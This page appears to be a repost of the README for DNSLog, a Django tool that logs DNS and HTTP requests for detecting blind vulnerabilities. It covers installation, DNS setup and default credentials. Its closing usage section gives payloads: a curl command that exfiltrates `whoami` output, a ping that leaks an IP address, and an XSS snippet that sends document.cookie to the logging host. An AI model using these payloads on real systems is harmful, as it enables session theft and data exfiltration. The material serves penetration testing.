Hacking Book | Free Online Hacking Learning

 Home

bugscan team / dnslog: dnslog is a tool for monitoring dns resolution records and http access records.

Posted by bassolino at 2020-02-27
all
____ _ _ ____ _ | _ \| \ | / ___|| | ___ __ _ | | | | \| \___ \| | / _ \ / _` | | |_| | |\ |___) | |__| (_) | (_| | |____/|_| \_|____/|_____\___/ \__, | |___/

brief introduction

Dnslog is a tool for monitoring DNS resolution records and HTTP access records created by bugscan team of four leaf grass security. It plays a very important role in detecting blind injection vulnerabilities and is one of the core libraries in the distributed vulnerability scanning framework bugscan.

Dnslog is written based on Django framework, integrating dnsserver into dnslog, and users can easily build the use environment.

You can visit the demo site here

install

You can clone the latest source code in the code warehouse by using Git

$ git clone [email protected]:BugScanTeam/DNSLog.git

Or you can click here to download the latest source code zip package and extract it

$ wget https://github.com/BugScanTeam/DNSLog/archive/master.zip $ unzip master.zip

Django 1.8 and dnslib need to be installed before dnslog can be used. If they are already installed, skip this step

$ cd dnslog $ pip install -r requirements.pip

Domain name and public IP preparation

To build and use dnslog, you need to have two domain names, one for NS server domain name (e.g. a.com) and one for recording domain name (e.g. b.com). You also need to have a public IP address (for example, 1.1.1.1)

Note: domain name providers of b.com need to support custom ns records, while a.com does not.

Set two a records in a.com:

ns1.a.com A 记录指向 1.1.1.1 ns2.a.com A 记录指向 1.1.1.1

Modify the NS record of b.com to the two domain names set in 1

In this step, you need to set it on the page provided by the domain name provider. Some domain name providers are only allowed to modify the NS record as an authenticated ns address. Therefore, you need to find a domain name provider that supports modifying NS records as your own NS.

Note: some regions will take 24-48 hours to take effect after the NS record is modified

Modify profile

Modify the relevant configuration in dnslog / dnslog / settings.py file:

dnslog/dnslog/settings.py

The domain name correspondence in the configuration file is the same as step 3

# 做 dns 记录的域名 DNS_DOMAIN = 'b.com' # 记录管理的域名, 这里前缀根据个人喜好来定 ADMIN_DOMAIN = 'admin.b.com' # NS域名 NS1_DOMAIN = 'ns1.a.com' NS2_DOMAIN = 'ns2.a.com' # 服务器外网地址 SERVER_IP = '1.1.1.1' $ cd dnslog/ $ sudo python manage.py runserver 0.0.0.0:80

The default startup port of Django web is 8000. To start on port 80, you need root permission

If you don't want to start on port 80, but you want to use HTTP without adding a port number, you can install nginx yourself and do the reverse proxy for b.com

Nginx reverse proxy reference script:

HTTPS universal certificate request (let's encrypt)

Install acme curl https://get.acme.sh | sh

curl https://get.acme.sh | sh

Start DNS server Python zoneresolver.py separately

python zoneresolver.py

Add API script for acme

Application certificate

acme.sh --issue -d "*.xxx.com" --dns dns_log --debug --dnssleep 10

acme.sh --issue -d "*.xxx.com" --dns dns_log --debug --dnssleep 10

Installation certificate

Acme will automatically check whether the certificate expires or not, and will automatically restart nginx to make the certificate effective after applying for a new certificate

Site management

After the service is started successfully, visit http://b.com/admin/ to enter the background

http://b.com/admin/

Administrator user name and password are all admin by default

If you forget the administrator password, you can enter the dnslog directory and execute the following command to reset the administrator password

python manage.py changepassword admin

Ordinary users

Add the user information in the user table. Test / 123456 already exists by default.

test/123456

Visit http://admin.b.com (domain name specified by admin? Domain) and enter the user name and password to log in.

http://admin.b.com

After visiting, you will see your secondary domain name, such as test.b.com. When you request any sub domain under the secondary domain name, test.b.com will be recorded, such as demo.test.b.com.

Using skills

Command blind note utilization

For some command blind injection class vulnerabilities, you can convert them into commands with echo execution through the weblog part of dnslog:

curl "http://testhash.test.dnslog.link/?`whoami`"

See the results under the web console:

Get source IP address in DNS record

See issue 3 for details

ping -c 3 `ifconfig en0|grep "inet "|awk '{print $2}'`.test.dnslog.link

The effect is as follows:

➜ ~ ping -c 3 `ifconfig en0|grep "inet "|awk '{print $2}'`.test.dnslog.link PING 192.168.10.167.test.dnslog.link (106.186.118.146): 56 data bytes 64 bytes from 106.186.118.146: icmp_seq=0 ttl=52 time=259.491 ms 64 bytes from 106.186.118.146: icmp_seq=1 ttl=52 time=307.566 ms 64 bytes from 106.186.118.146: icmp_seq=2 ttl=52 time=352.757 ms --- 192.168.10.167.test.dnslog.link ping statistics --- 3 packets transmitted, 3 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 259.491/306.605/352.757/38.082 ms

XSS blind beat

Add the following code to the page with XSS vulnerability:

var s=document.createElement('img'); s.src="http://xss.test.dnslog.link/?url="+document.location+"&cookie="+document.cookie; document.head.appendChild(s);

Take httpbin.org for example. Once triggered, you can see in Weblog:

httpbin.org

Related links

© 2023